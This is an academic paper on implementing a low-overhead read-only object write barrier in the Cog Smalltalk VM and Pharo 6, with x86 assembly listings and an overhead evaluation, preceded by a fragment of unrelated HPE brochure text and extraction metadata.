hpe.com/storage HPE Networking, hpe.com/networking HPE Technology Consulting Services, hpe.com/us/en/services/consulting.html Because of the rapidly changing nature of the container landscape, it is important to monitor the latest developments and their impacts on CI/CD and security. The Docker Captains, https://www.docker.com/community/docker-captains, are a group of cross-industry Docker specialists who actively share up-to-date knowledge and it is recommended that you follow the blogs of those captains who focus on security concerns. To help us improve our documents, please provide feedback at hpe.com/contact/feedback.
{"Source-Url": "https://assets.ext.hpe.com/is/content/hpedam/documents/a00020000-0999/a00020437/a00020437enw.pdf", "len_cl100k_base": 15406, "olmocr-version": "0.1.53", "pdf-total-pages": 30, "total-fallback-pages": 0, "total-input-tokens": 61806, "total-output-tokens": 17463, "length": "2e13", "weborganizer": {"__label__adult": 0.0002551078796386719, "__label__art_design": 0.000400543212890625, "__label__crime_law": 0.00022971630096435547, "__label__education_jobs": 0.0005974769592285156, "__label__entertainment": 5.6862831115722656e-05, "__label__fashion_beauty": 0.0001099705696105957, "__label__finance_business": 0.00046133995056152344, "__label__food_dining": 0.00016629695892333984, "__label__games": 0.0004870891571044922, "__label__hardware": 0.0012655258178710938, "__label__health": 0.00013971328735351562, "__label__history": 0.00015020370483398438, "__label__home_hobbies": 0.00010669231414794922, "__label__industrial": 0.00034999847412109375, "__label__literature": 0.00013780593872070312, "__label__politics": 0.00014984607696533203, "__label__religion": 0.0002079010009765625, "__label__science_tech": 0.0151214599609375, "__label__social_life": 7.385015487670898e-05, "__label__software": 0.017333984375, "__label__software_dev": 0.96142578125, "__label__sports_fitness": 0.00014352798461914062, "__label__transportation": 0.0002663135528564453, "__label__travel": 0.00013005733489990234}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 73020, 0.02956]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 73020, 0.17072]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 73020, 0.81771]], "google_gemma-3-12b-it_contains_pii": [[0, 105, false], [105, 3796, null], [3796, 8818, null], [8818, 13464, null], [13464, 14512, null], [14512, 18298, null], [18298, 20431, null], [20431, 21725, null], [21725, 24714, null], [24714, 27123, null], [27123, 30124, null], [30124, 30813, null], [30813, 33085, null], [33085, 35430, null], [35430, 39321, null], [39321, 42145, null], [42145, 44291, null], [44291, 47113, null], [47113, 52263, null], [52263, 57805, null], [57805, 60166, null], [60166, 62913, null], [62913, 64520, null], [64520, 65727, null], [65727, 66421, null], [66421, 68953, null], [68953, 71027, null], [71027, 71325, null], [71325, 71480, null], [71480, 73020, null]], "google_gemma-3-12b-it_is_public_document": [[0, 105, true], [105, 3796, null], [3796, 8818, null], [8818, 13464, null], [13464, 14512, null], [14512, 18298, null], [18298, 20431, null], [20431, 21725, null], [21725, 24714, null], [24714, 27123, null], [27123, 30124, null], [30124, 30813, null], [30813, 33085, null], [33085, 35430, null], [35430, 39321, null], [39321, 42145, null], [42145, 44291, null], [44291, 47113, null], [47113, 52263, null], [52263, 57805, null], [57805, 60166, null], [60166, 62913, null], [62913, 64520, null], [64520, 65727, null], [65727, 66421, null], [66421, 68953, null], [68953, 71027, null], [71027, 71325, null], [71325, 71480, null], [71480, 73020, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 73020, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 73020, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 73020, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 73020, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 73020, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 73020, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 73020, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 73020, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 73020, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 73020, null]], "pdf_page_numbers": [[0, 105, 1], [105, 3796, 2], [3796, 8818, 3], [8818, 13464, 4], [13464, 14512, 5], [14512, 18298, 6], [18298, 20431, 7], [20431, 21725, 8], [21725, 24714, 9], [24714, 27123, 10], [27123, 30124, 11], [30124, 30813, 12], [30813, 33085, 13], [33085, 35430, 14], [35430, 39321, 15], [39321, 42145, 16], [42145, 44291, 17], [44291, 47113, 18], [47113, 52263, 19], [52263, 57805, 20], [57805, 60166, 21], [60166, 62913, 22], [62913, 64520, 23], [64520, 65727, 24], [65727, 66421, 25], [66421, 68953, 26], [68953, 71027, 27], [71027, 71325, 28], [71325, 71480, 29], [71480, 73020, 30]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 73020, 0.0436]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
4228cd5170f4bd84d754db801d555f8cdbb65188
A low Overhead Per Object Write Barrier for the Cog VM Clément Bera To cite this version: Clément Bera. A low Overhead Per Object Write Barrier for the Cog VM. IWST 16, 2016, Pragues, Czech Republic. Proceedings of the 11th edition of the International Workshop on Smalltalk Technologies. <10.1145/2991041.2991063>. <hal-01356338> HAL Id: hal-01356338 https://hal.archives-ouvertes.fr/hal-01356338 Submitted on 26 Aug 2016 HAL is a multi-disciplinary open access archive for the deposit and dissemination of scientific research documents, whether they are published or not. The documents may come from teaching and research institutions in France or abroad, or from public or private research centers. L’archive ouverte pluridisciplinaire HAL, est destinée au dépôt et à la diffusion de documents scientifiques de niveau recherche, publiés ou non, émanant des établissements d’enseignement et de recherche français ou étrangers, des laboratoires publics ou privés. Abstract In several Smalltalk implementations, a program can mark any object as read-only (unfortunately incorrectly sometimes miscalled immutable). Such read-only objects cannot be mutated unless the program explicitly revert them to a writable state. This feature, called write barrier, may induce noticeable overhead if not implemented carefully, both in memory footprint and execution time. In this paper I discuss the recent addition of the write barrier in the Cog virtual machine and the support introduced in the Pharo 6 image. I detail specific aspects of the implementation that allows, according to multiple evaluations presented in the paper, to have such a feature with little to no overhead. Keywords Language Virtual Machine, Just-in-Time Compilation, Interpreter, Write Barrier, Store Check. 1. Introduction Read-only objects are frequently used in several Smalltalk dialects to ensure the unchangeable state of runtime objects such as compiled methods’ literals and in the context of object modification tracker frameworks such as Gem Builder for Smalltalk¹ (GBS). The Cog virtual machine (VM) [11] is the most widely used open source Smalltalk virtual machine, with multiple Smalltalk clients: Pharo [2], Squeak [8] and Cuis [3]. Unfortunately, the Cog VM did not support read-only objects. I decided to introduce such a feature, with the help and advises of the lead Cog VM architect, Eliot Miranda. In this paper, I discuss the design decisions behind the write barrier and the implementation in both the Cog VM and the Pharo 6 implementation. Other Smalltalk clients run- ¹ GBS is a tool maintained and evolve by GemTalk™ Systems allowing applications written in any Smalltalk dialects to communicate with the Gemstone persistence layer. Conceptually, having read-only objects requires each store into an object to have an extra check to fail the store if the object mutated is read-only. An extra check induces extra memory and execution time overhead as additional machine instructions are required to perform the check. In addition, the memory representation of the object needs to be adapted to encode the read-only property of the object. The main challenge in the write barrier implementation is to reduce the overhead, both in term of memory footprint and execution time, as much as possible. In most VMs for high-level object-oriented languages, each store into an object has already multiple checks for the garbage collector (GC) write barrier [9, 10]. In the implementation sections, I detail the most critical part: how the machine code generated by the JIT shares portion of machine code between the read-only check and the existing GC write barrier to limit the overhead. 2. Problem In this section I specify what I mean by read-only object write barrier, discuss the terminology used, then describe briefly some use-cases and precise the problem statement. 2.1 Specification The feature wanted, the write barrier, allows a Smalltalk program to mark or unmark any non-immediate object² as read-only at any time. Any write into a read-only object is intercepted before the object is mutated and it should be possible to handle the mutation failure at the language level. 2.2 Terminology This feature is called in some other Smalltalk, especially VisualWorks, immutability. Using the term immutability was ² Non-immediate objects have a memory zone holding the object’s state and references to the object are implemented through pointers to that memory zone. On the contrary, immediate objects are not present in memory and their state is directly encoded in the pointer referencing the immediate object. The best example of immediate objects are 31-bit signed integers, also called SmallIntegers. contested by the Smalltalk community. Indeed, in object-oriented and functional programming, for example in Racket \cite{4}, an immutable object is an object which state cannot be modified after it is created. Therefore, in our case, as the programmer can revert the read-only state of an object to writable state at any time, the immutability definition does not apply. This is why in Pharo and in this paper the feature is called write barrier and not immutability. 2.3 Use-cases There are multiple use-cases for read-only objects. I detail here the two most common ones. Modification tracker. The most popular use-case is the ability to track the mutations done to a specific object. In this case, the tracked object is marked as read-only. Each mutation of the tracked object triggers Smalltalk code specified by the programmer to do something about the mutation, for example, logging. Then, the modification tracker framework temporarily makes the object writable, performs the mutation, and mark back the object as read-only to resume the execution while still tracking the object’s mutations. This modification tracking ability is for example used in GBS, a framework to deeply integrate a Smalltalk application with the gemstone persistence layer. Core read-only objects. Another interesting read-only object use-case is the ability to mark runtime objects such as compiled methods’ literals as read-only. Having the literals read-only allows compilers to make stronger assumptions to allows more aggressive optimisations and forbid inconsistent modification of literals avoiding hard-to-debug issues. 2.4 Problem: limiting the overhead The problem statement is as follows: *Is it possible to mark object as read-only, forbidding any mutations and letting Smalltalk code handle the mutation failures, with little to no overhead in term of memory footprint and execution time?* To solve this problem, I chose to extent the virtual machine. Indeed, I believe the solutions provided at image level either induce an important overhead or are not thorough enough. For example, it is possible using reflective APIs to activate any primitive operation on any object in the system. Some primitive operations, such as the at:put: primitive, mutate objects. Detecting such mutations is very difficult, likely even impossible, without VM support. The solution was implemented in three steps: - Enhancing the memory representation of objects to be able to encode their read-only state. - Adding support in the execution engine to forbid read-only objects mutations. - Adding support in the Pharo image to be able to use the new feature. Memory representation of objects. To support read-only object, the first thing is to change the memory representation of objects to be able to mark them as read-only. To do so, each object needs a specific memory location to encode the state: is the object read-only or not? As other Smalltalk dialects, a bit seems appropriate as there are only two possible cases. I detail later in the paper the position of this bit. As the bit is in the object’s header and immediate objects have no header, immediate objects cannot be read-only. The VM can directly access the object’s state, but the Smalltalk code can’t. So I added two convenient primitives in Pharo to access the bit state. One primitive tells if an object is read-only or not, the other sets the object as read-only or writable. Execution support. The objects are mutated in two main ways in the current virtual machine: - By storing into one of their instance variable field (byte-code instruction). - By performing a primitive operation that mutates object, such as at:put:. In the paper I omit explicitly another case, the literal variable stores. For the execution engine, a literal variable store is an instance variable store mutating the second field of an object specified in the literal frame of the method. Hence, the discussions related to instance variable store also apply to literal variable stores. In the execution engine, the instance variable store code was changed to fail if the mutated object is read-only. If that happens, a callback is triggered in the image to inform the program that an attempt to assign a value to a read-only object was made, and once the call-back returns, the execution resumes after the store. The callback is triggered instead of the store, hence if one wants the store to be performed one needs to do it explicitly in the callback. The code of the primitives mutating objects was rewritten to fail the primitive if they mutate a read-only object. Limitations. While implementing the solution, I realized it is really difficult to have a few specific objects read-only. The first problem is related to process scheduling. At each interrupt point, the execution may switch to another process. Switching from a process to another process implies multiple process scheduling objects mutations, whereas the execution state (in the middle of a process switch) is not in a state where a call-back can be safely triggered in the image. The second issue lies with context objects. Contexts represent method and closure activations. They are handled very specifically in the virtual machine for performance and they are mutated all the time during normal execution: any byte-code operation requires at least to mutate the active context program counter. Lastly, by design, the VM assumes that temp vectors (data structure used to store closure enclosing context information), are never read-only. To solve these problems, I specify here a list of objects that cannot be marked as read-only. Any attempt to mark those objects as read-only from Smalltalk will fail. These objects are: - Context instances - All objects related to process scheduling: - the global variable Processor - the array of linked lists of processes (Processor instance variable) - ProcessLinkedList instances - Process instances - Semaphore instances In addition to those objects, specific objects used directly by the runtime cannot be marked as read-only. One example is temp vectors, which are used to hold block closures remote variable values, but also objects internal to the VM as for example the class table. I discuss in future work how one may be able to bypass some of those limitations. 3. Image API design and implementation In this section I introduce the APIs added in the image to support read-only objects. I do not discuss the in-image implementation of features using the write barrier such as an object modification tracker. I discuss only the interface between the virtual machine and the image allowing one to use the write barrier and to build features such as an object modification tracker. 3.1 Core write barrier primitives Two main primitives were added into the Object class: - Object#isReadOnlyObject - Object#setIsReadOnlyObject: **Object#isReadOnlyObject.** The primitive answers if the receiver read-only. The primitive cannot fail on a VM supporting the write barrier. The primitive method code is available in Figure 1. The Pharo 6 alpha version is available with additional comments, omitted in the paper. ```plaintext Object#isReadOnlyObject <primitive: 163> ^self primitiveFailed ``` **Figure 1.** Object#isReadOnlyObject primitive **Object#setIsReadOnlyObject:** This second primitive marks the receiver as being read-only or writable, depending on the boolean parameter. The primitive method code is available in Figure 2. ```plaintext Object#setIsReadOnlyObject: aBoolean <primitive: 164 error: ec> ^self primitiveFailed ``` **Figure 2.** Object#setIsReadOnlyObject: primitive of two methods? The answer is simple, the number of primitives has to be kept as small as possible to keep the VM implementation simple, hence sharing the same primitive number for these two operations seemed the right thing to do. However, for convenience, two helper methods were added, Object#beWritableObject and Object#beReadOnlyObject, only calling the primitive with the corresponding boolean parameter, as shown in Figure 3. ```plaintext Object#beWritableObject ^self setIsReadOnlyObject: false Object#beReadOnlyObject ^self setIsReadOnlyObject: true ``` **Figure 3.** Helper methods 3.2 Primitive failure As stated in the Section 2.4, primitive operations mutating objects should fail if they attempt to mutate a read-only object. Two modifications are required to support the write barrier. **Image-side.** Each primitive failure fall-back code needs to be edited to raise an appropriate error if it failed due to the write barrier. For example, in the case of the primitive for at:put:, the in-image fall-back code should check if the receiver is read-only, raising an appropriate error (for example ‘object cannot be modified’) instead of ‘Instances of Objects are not indexable’. Unfortunately, this part has not, at the moment where I write the paper, been integrated in the Pharo 6 alpha. **VM-side.** To help the programmer understanding why a primitive fails, the virtual machine is able to provide error messages. This is done by adding the keyword error: in the primitive pragma. For example, in Figure 2, the primitive pragma has the error: keyword, hence if the primitive fails the temporary variable ec is going to hold an error message. The special objects array defines a list of error messages that can be answered by the VM. This list now defines the message ‘no modification’ which is raised when a primitive fails due to the write barrier. 3.3 Instance variable store As instance variable stores are encoded directly in the bytecode and not through message sends as primitives, they can’t simply just fail or the VM state would be inconsistent. The easiest way to handle this case was to add a VM call-back to be performed when a store fails. An infrastructure for such call-backs is already available and is used for example for doesNotUnderstand. However, this VM-call back is more difficult to implement. Our specification requires the read-only failure to resume execution, once the call-back is done, after the variable store. The problem is that the VM does not expect any value to be pushed on stack after a variable store. If we take the example of doesNotUnderstand:, the call-back is triggered during a message send. In Smalltalk, each message send is expected to return a value, hence the value returned by the doesNotUnderstand: method activation is pushed on stack instead of the regular message send returned value. In the read-only call-back case, the VM does not expects any value to be pushed on stack after a variable store. Therefore, I needed to design a call-back that does not answer any value. This is currently possible in Pharo by modifying the active process. The cannotAssign:withIndex: call-back was designed this way. After handling the mutation failure, the call-back does not return any value as the Smalltalk code on Figure 4 shows. The comment "CANT REACH", indicates that the execution flow cannot reach that part of the code. attemptToAssign: value withIndex: index | process | "Handle here the mutation failure. Code omitted." "Process modified to return no value" process := Processor activeProcess. [ | sender | sender := process suspendedContext sender. process suspendedContext: sender. ] forkAt: Processor activePriority + 1. Processor yield. "CANT REACH" Figure 4. Pharo call-back implementation This implementation is a temporary solution as it cannot work with processes already at max priority. I am considering alternatives, such as a new primitive or a bytecode instruction performing returns non returning any value. 3.4 Other in-image features Support flags. The Cog VM provides to the Smalltalk clients a set of parameters. A new parameter was added, answering if the VM currently used supports read-only objects. In the case of Pharo, it is now possible to run Smalltalk VM supportsWriteBarrier to know if the feature is enabled. Mirror primitives. The Cog VM, as well as several other Smalltalk VMs, supports having objects with a class not inheriting from Object. Such objects are typically used for proxies. Sending messages to this kind of objects can be a problem: the object may not be able to answer the message nor to answer the doesNotUnderstand: message, leading to a VM crash. This kind of problem usually happens when the programmer attempts to debug a program with proxy objects: in this case, the proxies understand all the messages required for the application, but do not understand the messages required for debugging. To avoid VM crashes, proxies are debugged through mirror primitives. For example, the primitive instVarAt: answers the value of an instance variable of an object. This primitive exists in two variants: - instVarAt: Answers an instance variable of the receiver. - object:instVarAt: Answers an instance variable of the object passed as first argument. The second version, ignoring the receiver entirely, is called a mirror primitive. It is able to perform a primitive operation on an object (in this case, the first argument), without requiring the object to be able to understand a message. In the context of the write barrier, the two primitives isReadOnlyObject and setsIsReadOnlyObject: are also available as mirror primitives (the primitive number is shared), in the form of object:isReadOnlyObject and object:setsIsReadOnlyObject:. This way, it is possible to modify and read the read-only property of proxy objects. 4. VM implementation The VM implementation is split in three subsections, the object representation, the interpreter and the JIT compiler changes. 4.1 Object representation Each non-immediate object is represented in memory with an object header, describing the object, and multiple fields, depending on the object’s layout. Several bits in the object header are unused and a single bit was reserved by design in the Spur Memory Manager [12] for the write barrier. I used this bit to mark the read-only state of an object, as shown on Figure 5. <table> <thead> <tr> <th>number of slots</th> <th>object format</th> <th>is remembered?</th> </tr> </thead> <tbody> <tr> <td>identity hash</td> <td>class index</td> <td>is marked?</td> </tr> <tr> <td>is grey?</td> <td>is pinned?</td> <td>isReadOnly?</td> </tr> <tr> <td>unused bits</td> <td></td> <td></td> </tr> </tbody> </table> Figure 5. Object header memory representation in Spur 4.2 Interpreter implementation 4.2.1 Primitives. I needed to add support for primitives to fail if they attempt to mutate a read-only object. Many primitives can already fail. For example, `<primitive:1>`, the addition between two small integers, fails if the argument is not a small integer. Hence, I needed to edit all the primitives mutating objects to first check if the object mutated is read-only, and fail the primitive if this happens. This was quite tedious as I had to go through all the primitive table and check manually for each primitive if the code mutates an object. This task was simplified by the limitations: as stated in Section 2.4, several objects can’t be read-only, so the primitives related to process scheduling and context accessing didn’t need to be changed. 4.2.2 Instance variable stores. I needed to update the interpretation of instance variable stores to fail and trigger the `cannotAssign:withIndex:` callback if the object mutated is read-only. Some aspects are challenging. Interpreted compilation and emulation. The interpreter code is written in Slang, a DSL to write virtual machines written using the Smalltalk syntax to be able to emulate the execution on top of the Smalltalk VM. For the production VM, Slang is compiled to C with the GNU extensions, which is then compiled to machine code. The C-language extensions are critical for performance as an interpreter has a very different behavior than mainstream C application. C extension constraints. Most of the interpreter code is compiled in a single C function. That function uses the C-extensions to fix specific values to registers, such as the Smalltalk stack pointer, frame pointer and instruction pointer. The execution jumps quickly from the interpretation of a bytecode to the next one using threaded jumps the the new bytecode execution code address. If the interpreter needs to call another function, it needs to save the fixed registers manually and restore them upon function return if they are going to be used. Challenges met. This specificity is sometimes difficult to handle because the execution flow in the extended C code is non trivial to reproduce on the simulation engine which runs on top of the Smalltalk VM. In addition, one has to be very careful if the interpreter calls a function non-inlined during Slang to C compilation in the main interpreter function to correctly maintain the registers state. Conclusion. To implement the read-only write barrier, both the simulation engine used for debugging and the extended C code needs to have the same behavior according to the new specifications. 4.3 JIT compiler support 4.3.1 Primitives. As for the interpreter, I needed to update the JIT to compile primitive operations according to the new specification. Primitives redefined in the JIT. The interpreter primitives are normally written in Slang and are compiled to machine code as the rest of the VM. As the compilation is done through the optimizing C compiler, the primitives performance is usually very good. However, calling C code from a machine code Smalltalk method has a cost: the runtime needs to switch from the Smalltalk machine code runtime to the C runtime, execute the primitive, then switch back to the Smalltalk machine code runtime. This cost can be significant on very frequently used primitives, as for example the addition between two small integers. For this purpose, a set of primitives are redefined in the JIT register transfer language (RTL) 1 and are compiled to machine code with the methods holding the corresponding primitive number. For the purpose of this paper, we will consider that there are two kinds of primitives: - Frequently called primitives: They are redefined in the JIT’s RTL. - Rarely called primitives: When a method with such primitive is compiled to machine code, the machine code switches to the C runtime and then calls the interpreter primitive code. All the existing interpreter primitive code was updated to fail for read-only objects. However, primitives redefined in the JIT’s RTL needs to be updated to correctly fail if they mutate a read-only object. Updating `at:put:`. Fortunately, only two primitives considered as frequently called and therefore defined in the JIT’s RTL mutate objects. One of them is the primitive `at:put:` while the other one is a specific version of `at:put:` for strings. I updated these two primitives to generate machine code failing if the receiver is read-only. 4.3.2 Instance variable stores. With the write barrier, the machine code generated for instance variable stores require an extra check to fail if the object mutated is read-only. Studied case. The JIT compiles to machine code the stores differently depending on multiple constraints. For example, the compilation is different depending on which register is live or not when compiling the store. In this subsection, I will only discuss the most common cases, a generic instance variable store of the first instance variable of an object that we will call a `lambda store`. Other cases are handled in a similar way. 1 A register transfer language (RTL) is a kind of intermediate representation that is very close to assembly language, similar to those used by compilers. RTLs describe data flow at the register-transfer level of an architecture. **GC store check.** Before the write barrier implementation, a lambda store needs to change in memory the value of the instance variable and to deal with the GC write barrier. Currently, the GC requires each object from old space referencing a young object to be in the remembered table. Hence, each store can require the VM to add an entry in the remembered table. Each store generates machine code to check if the object needs to be added in the remembered table. If this is the case, the VM calls a trampoline which saves the registers state, call the interpreter function adding the object in the remembered table, restores the registers and resumes execution. The existing machine code generated for a lambda store is shown on Figure 6. ![Figure 6. Vanilla lambda store](image) <table> <thead> <tr> <th>x86 Assembly</th> <th>Meaning</th> </tr> </thead> <tbody> <tr> <td>movl -12(%ebp), %edx</td> <td>Load the receiver in %edx.</td> </tr> <tr> <td>popl %edi</td> <td>Load the value to store in %edi.</td> </tr> <tr> <td>movl %edi, %ds:0x8(%edx)</td> <td>Perform the store in the first instance variable using both registers (%edx and %edi)</td> </tr> <tr> <td>testl 0x00000003, %edi</td> <td>If the value to store is immediate, jump after the store check.</td> </tr> <tr> <td>jnz after_store</td> <td></td> </tr> <tr> <td>movl 0x00040088, %eax</td> <td>Jump after the store check if the receiver is young; compare the young object space limit with receiver address</td> </tr> <tr> <td>cmpl %eax, %edi</td> <td>If the value to store is an old object, jump after the store check.</td> </tr> <tr> <td>jb after_store</td> <td></td> </tr> <tr> <td>cmpl %eax, %edi</td> <td>If the value to store is an old object, jump after the store check.</td> </tr> <tr> <td>jnb after_store</td> <td></td> </tr> <tr> <td>movzb %ds:0x3(%edx), %eax</td> <td>If the receiver is already in the remembered table, jump after the store check.</td> </tr> <tr> <td>testb 0x20, %al</td> <td></td> </tr> <tr> <td>jnz after_store</td> <td></td> </tr> <tr> <td>call store_check_trampoline</td> <td>Calls the store check trampoline.</td> </tr> <tr> <td>after_store:</td> <td>Code following the store.</td> </tr> </tbody> </table> **Figure 7. Considered read-only check** <table> <thead> <tr> <th>x86 Assembly</th> <th>Meaning</th> </tr> </thead> <tbody> <tr> <td>movl %ds:(%edx), %eax</td> <td>If the receiver is writable, jump to the store.</td> </tr> <tr> <td>testl 0x00800000, %eax</td> <td>Calls the read-only failure trampoline.</td> </tr> <tr> <td>jz begin_store</td> <td></td> </tr> <tr> <td>call cannot_assign_trampoline</td> <td>Restore the receiver (to keep its register live) and jump after the store.</td> </tr> <tr> <td>movl -12(%ebp), %edx</td> <td></td> </tr> <tr> <td>jmp after_store</td> <td>Next instruction is the first store instruction.</td> </tr> </tbody> </table> This solution implied quite some overhead because the machine code needed to take an extra branch on the common path and because many new machine instructions were added per instance variable store. **Efficient read-only check.** I then built a second solution, where a single per-store trampoline is shared between the GC and the read-only write barrier, as shown on Figure 8. As the instruction to call the trampoline is the one that takes the more bytes, the general idea was to avoid most of the overhead by having single call. I created new trampolines that are able to deal with both the case of the GC and the read-only write barrier. In this new version, the machine code tests first if the object is read-only, and if so, directly jumps to the shared trampoline. **New trampolines.** To be able to share the trampoline without adding too many instructions, as the trampoline is rarely taken, the trampoline duplicates the read-only check. The normal execution flow checks if the object is read-only and jumps to the trampoline if it is the case. In the trampoline, the VM does not know any more if the trampoline was reached for a read-only mutation failure or the GC write barrier. Hence, the trampoline tests again if the object mutated is read-only and calls the correct interpreter method to handle either case. **Specialized trampolines for common indexes.** In the case of a read-only mutation failure, to perform the call-back, the VM has to know what is the variable index of the object. In the case of a lambda store, we said the instance variable was the first instance variable, so in a 0-based array, the variable index is 0. The problem is that to perform the trampoline call the variable index needs to be passed as a parameter, requiring extra machine instructions per-store (In the Cog VM all trampoline parameters are passed by registers). To avoid the extra instructions, the trampoline is duplicated. A fixed number of trampolines based on a VM setting are created, currently 6. Each of the most common variable indexes (0 to 4) can call a specialized version of the trampoline for the --- 4 A trampoline is a specific machine code routine switching from the assembly code runtime to the C runtime. given index (so it is not required to pass the variable index by parameter in those common cases), and other variable indexes, less common, call the generic trampoline passing by parameter the variable index. Register liveness. As the read-only failure trampoline creates a new stack frame for the cannotAssign:withIndex: callback, the registers cannot remain live across the trampoline. I decided to keep the receiver live if it was already live by injecting the corresponding machine code after the store if the receiver was live before, as a live receiver is the most critical for performance. Hence, only the receiver can remain live in a register across the read-only write barrier trampoline call. <table> <thead> <tr> <th>x86 Assembly</th> <th>Meaning</th> </tr> </thead> <tbody> <tr> <td>movl -12(%ebp), %edx</td> <td>Load the receiver in %edx.</td> </tr> <tr> <td>popl %ecx</td> <td>Load the value to store in %ecx.</td> </tr> <tr> <td>movl %ds:0x8(%edx), %eax</td> <td>If the receiver is read-only, jump to the store trampoline.</td> </tr> <tr> <td>testb 0x00800000, %eax</td> <td>If the value to store is immediate, jump after the store check.</td> </tr> <tr> <td>jnz after_store</td> <td>If the receiver is a young object, jump after the store check.</td> </tr> <tr> <td>movl 0x00040088, %eax</td> <td>If the receiver is read-only, jump to the store trampoline.</td> </tr> <tr> <td>cmpl %eax, %edx</td> <td>If the receiver is a young object, jump after the store check.</td> </tr> <tr> <td>jb after_store</td> <td>If the value to store is an old object, jump after the store check.</td> </tr> <tr> <td>cmpl %eax, %ecx</td> <td>If the receiver is already in the remembered table, jump after the store check.</td> </tr> <tr> <td>jnb after_store</td> <td>Calls the store check trampoline.</td> </tr> <tr> <td>movzb%ds:0x3(%edx), %eax</td> <td>If the receiver is already in the remembered table, jump after the store check.</td> </tr> <tr> <td>testb 0x20, %al</td> <td>If the value to store is an old object, jump after the store check.</td> </tr> <tr> <td>jnz after_store</td> <td>Calls the store check trampoline.</td> </tr> <tr> <td>store_trampoline:</td> <td>Code following the store.</td> </tr> <tr> <td>call store_trampoline</td> <td>Restore the receiver (to keep its register live).</td> </tr> <tr> <td>movl -12(%ebp), %edx</td> <td>Code following the store.</td> </tr> </tbody> </table> Figure 8. Production lambda store with the write barrier Debugging support. Without the write barrier, literal and instance variable stores are not interrupt points. The debugger cannot be opened at this program counter and processes can’t switch on variable stores. With the write barrier, the cannotAssign:withIndex: callback can create new stack frame. If one of the method called opens a debugger, the programmer needs to be able to debug the context with the cannotAssign:withIndex: callback and the sender of this context. I therefore needed to extend the machine code method metadata to be able to debug methods interrupted on stores. Compilation. The write barrier was introduced as a compilation setting in the Cog virtual machine. By design, two choices were at hand, having the write barrier as a Slang to C compiler setting or as a C to machine code compiler setting. I firstly made it as a Slang compiler setting, but it was inconvenient as the build repository hierarchy needed to be duplicated by two to support the write barrier in all the builds. The write barrier was lastly changed to be a C compiler setting. The C compilation has now an extra setting, the (misleading) -DIMMUTABILITY=1 flag, to compile the VM with the write barrier. 5. Evaluation I evaluate firstly the memory overhead of the feature, then the execution time overhead. 5.1 Memory overhead Object representation. As described in Section 2.4, each object requires a single bit to mark their read-only state. As all the objects need to be 64bits aligned in the spur memory manager and one bit had already been reserved for the write barrier, in practice there is no memory overhead at all. Machine code memory footprint evaluation. The size of the machine code representation of methods matters a lot in the Cog VM. In fact, the VM keeps a fixed-sized executable zone holding all the machine code of methods. This zone is allocated at start-up depending on an in-image setting, which is usually between 1 and 2 Mb, but can be any value. The size of the machine code matters because: - When installing a new method, the VM needs to scan all the machine code zone and flush all the caches related to the new method selector. The machine code zone has to have a limited size to avoid for this scan to be too long. - Internally, the processor maps the frequently executed machine code to the cpu instruction cache. Having a limited machine code zone allows the cpu to have more instruction cache hits and improve the VM performance. - As machine code versions of methods directly refer to objects (the literals are compiled inlined in the machine code), the GC needs to scan the machine code zone to mark referenced objects. The size of the machine code zone matters as the GC needs to read the metadata associated with each machine code method to locate the objects referenced, so the bigger the zone is, the longer the GC takes. - As the machine code zone has a fixed size, if the methods are compiled in a smaller amount of machine code, the VM can fit more methods in the machine code zone before requiring a machine code zone garbage collection. I evaluate the machine code size growth firstly globally, then locally. **Machine code zone (globally).** As shown on Figure 9, just after start-up, the machine code zone occupied is 1.52% bigger with the write barrier that without. The overhead is there for multiple reasons: - Each instance and literal variable store is compiled in more machine instructions for the read-only write barrier. - The at:put: primitives are compiled with more instructions. - Additional trampolines are required at the beginning of the machine code zone for the write barriers failure. ![Figure 9. Machine code zone size](image) <table> <thead> <tr> <th></th> <th>Vanilla size after start-up (hex)</th> <th>Write Barrier</th> </tr> </thead> <tbody> <tr> <td>Vanilla</td> <td>91C00</td> <td></td> </tr> <tr> <td>Write Barrier</td> <td>93F80</td> <td></td> </tr> </tbody> </table> **Locally: trampolines.** When comparing the first available address between the VM with and without the read-barrier, one notices an overhead of 400 bytes, which corresponds to the size of the new trampolines. **Locally: per-store overhead.** In the case of a lambda store, the most common, the store needs 12 extra bytes per store to encode the extra machine instructions for the read-only check. The overhead may vary slightly as the number of Nops required for alignment between methods may change if the number of bytes of the method changes. **Locally: at:put.** Each at:put: primitive is 16 bytes bigger with the write barrier. **Comments.** The main concern in our case is the number of literal and instance variable stores. The number of trampolines is fixed during execution and there are at most two at:put: primitives. Hence, only the number of stores can seriously impact the memory footprint. As the global evaluation shown, stores seems to be pretty rare as the overall memory overhead is evaluated at 1.52%. ### 5.2 Execution time **Benchmarks.** I evaluated the difference in performance using the Games benchmarks [7] that is normally used for VM performance evaluation. Even in benchmarks with intensive instance variable stores, such as the binary tree benchmark, the execution overhead was within the cpu noise (so little that it could not be evaluated). I believe there is some overhead in such benchmarks, but the overhead is under 1% of execution time and I did not achieve to measure it. **Building a pathological case.** To see the performance difference, I built a micro-benchmark around a pathological case doing almost only instance variable store. ```dolt | guineaPig | guineaPig := MicroBench new. [guineaPig setImmediate: 2 nonImmediate: #bar ] bench ``` ![Figure 10. Pathological benchmark code and results](image) <table> <thead> <tr> <th></th> <th>Time to run pathological bench</th> </tr> </thead> <tbody> <tr> <td>Vanilla</td> 